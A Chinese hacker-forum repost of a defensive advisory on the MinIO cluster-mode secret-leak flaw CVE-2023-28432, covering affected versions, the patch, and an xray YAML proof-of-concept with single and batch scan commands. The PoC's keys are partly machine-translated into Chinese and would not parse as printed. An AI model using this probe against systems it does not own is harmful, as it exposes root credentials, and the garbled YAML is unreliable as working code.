跳转到帖子

游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

TheHackerWorld官方

【应急排查】MinIO 敏感信息泄露漏洞(CVE-2023-28432)

精选回复

发布于

## 漏洞介绍\r

\r

### 事件源\r

\r

MinIO提供了高性能、兼容S3的对象存储系统,允许用户构建自己的云存储服务。 MinIO 原生支持Kubernetes,并且可在每个独立的公共云、每个Kubernetes 发行版、私有云和边缘的对象存储套件上使用。 \r

\r

3月20日,MinIO官方发布安全补丁,修复敏感信息泄露漏洞CVE-2023-28432:[https://github.com/minio/minio/security/advisor ies/GHSA-6xvq-wj2x-3h3q](https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q)\r

\r

### 漏洞描述\r

\r

在集群模式配置中,部分MinIO接口由于信息处理不当,返回了所有环境变量信息(包括MINIO\\_SECRET\\_KEY和MINIO\\_ROOT\\_PASSWORD),导致敏感信息泄露漏洞。攻击者可以通过获取的关键配置信息直接登录操作MinIO接口。 \r

\r

只有在集群模式下配置的MinIO 才会受到此漏洞的影响。利用此漏洞不需要用户身份验证。官方建议所有使用集群模式的用户尽快进行配置升级。 \r

\r

### 受影响的版本\r

\r

MinIORELEASE.2019-12-17T23-16-33Z=MinIOVersionMinIORELEASE.2023-03-20T20-16-18Z\r

\r

### 解决方案\r

\r

MinIO官方已发布相应补丁修复该漏洞。用户可以通过升级至RELEASE.2023-03-20T20-16-18Z版本来修复该漏洞。 \r

\r

### 产品支持\r

\r

云图:默认支持本产品的指纹识别,也支持该漏洞的PoC原理检测。 \r

\r

Insight:支持自定义POC形式的检测。 \r

\r

雷驰:已经发布了自定义规则来支持该漏洞的利用检测。 \r

\r

牧云(主机安全):默认支持该产品的资产采集,同时也支持该漏洞的检测。 \r

\r

牧云(容器安全):默认支持该产品的资产采集,同时也支持该漏洞的检测。 \r

\r

完整信息:已发布更新包以支持检测此漏洞的利用情况。 \r

\r

## 漏洞排查计划\r

\r

长亭科技为安全社区提供多种免费的社区安全工具。详情请查看【长汀科技安全社区CTStack】(https://stack.chaitin.com/)\r

\r

此漏洞可被利用\r

\r

* 基于长汀洞远程评估系统的免费社区工具[XRay](https://stack.chaitin.com/tool/detail?id=1)\r

\r

* 基于长汀牧云主机/容器安全产品的细化的免费社区工具VeinMind\r

\r

\r

### 远程故障排除\r

\r

1. [下载最新版xray工具](https://stack.chaitin.com/tool/detail?id=1)。 \r

\r

2、新建文件,填写以下PoC内容,并命名:poc-yaml-minio-cve-2023-28432.yaml\r

\r

```yaml\r

name: poc-yaml-minio-cve-2023-28432\r

手册: true\r

Transport: http\r

规则:\r

poc01:\r

请求:\r

cache: true\r

method: POST\r

路径: /minio/bootstrap/v1/verify\r

headers:\r

Content-Type: 应用程序/x-www-form-urlencoded\r

follow_redirects: 假\r

expression: response.status==200 response.body.bcontains(b\'MinioEndpoints\')\r

poc02:\r

请求:\r

cache: true\r

method: POST\r

路径: /bootstrap/v1/verify\r

headers:\r

Content-Type: 应用程序/x-www-form-urlencoded\r

follow_redirects: 假\r

expression: response.status==200 response.body.bcontains(b\'MinioEndpoints\')\r

表达式: poc01() || poc02()\r

详情:\r

作者: 链\r

链接:\r

- https://docs.min.io/cn/\r

漏洞:\r

level: 高\r

````\r

\r

3. 如果要扫描单个目标,以Windows平台为例,执行以下命令:\r

\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com\r

\r

-p参数用于指定PoC文件的路径,-u参数用于指定扫描目标。 \r

\r

如果观察到以下输出,则表明存在漏洞:\r

\r

1.png

\r

\r

4、如果要批量扫描多个目标,以Windows平台为例:\r

\r

\r

新建target.txt,填写需要扫描的URL,以换行符分隔,如:\r

\r

http://1.example.com\r

http://2.example.com\r

\r

执行以下命令:\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -uf ./target.txt\r

\r

-uf参数用于指定扫描目标文件。输出与上面相同。 \r

\r

5、建议使用--json-output\\[文件名\\]或--html-output\\[文件名\\]参数将扫描结果保存在本地,方便查看和分析,例如:\r

\r

\r

.\\xray_windows_amd64.exe ws -p .\\poc-yaml-minio-cve-2023-28432.yaml -u http://www.example.com --html-输出result.html \r

\r

如果扫描结果存在漏洞,可以在指定位置生成报告,示例如下:\r

\r 2.png

\r

\r

6.详细的xray使用手册请参考[xray安全评估工具文档](https://docs.xray.cool/#/)\r

\r

\r

### 本地故障排除\r

\r

1.【下载MinIO专用漏洞扫描工具】(https://stack.chaitin.com/tool/detail?id=181)\r

\r

2.执行扫描命令\r

\r

\r

扫描本地镜像:\r

\r

./veinmind-minio 扫描图像\r

\r

扫描本地容器:\r

\r

./veinmind-minio 扫描容器\r

\r

3.如果看到如下结果,则说明存在漏洞\r

\r

\r 3.png

\r

\r

## 参考文献\r

\r

[https://mp.weixin.qq.com/s/JgskenAZ6Cpecoe2k2AEjQ](https://mp.weixin.qq.com/s/JgskenAZ6Cpecoe2k2AEjQ)\r

\r

[https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z](https://github.com/minio/minio/releases/tag/RELEASE.2023-03-20T20-16-18Z)\r

\r

[https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q](https://github.com/minio/minio/security/advisories/GHSA-6xvq-wj2x-3h3q)

创建帐户或登录后发表意见

最近浏览 0

  • 没有会员查看此页面。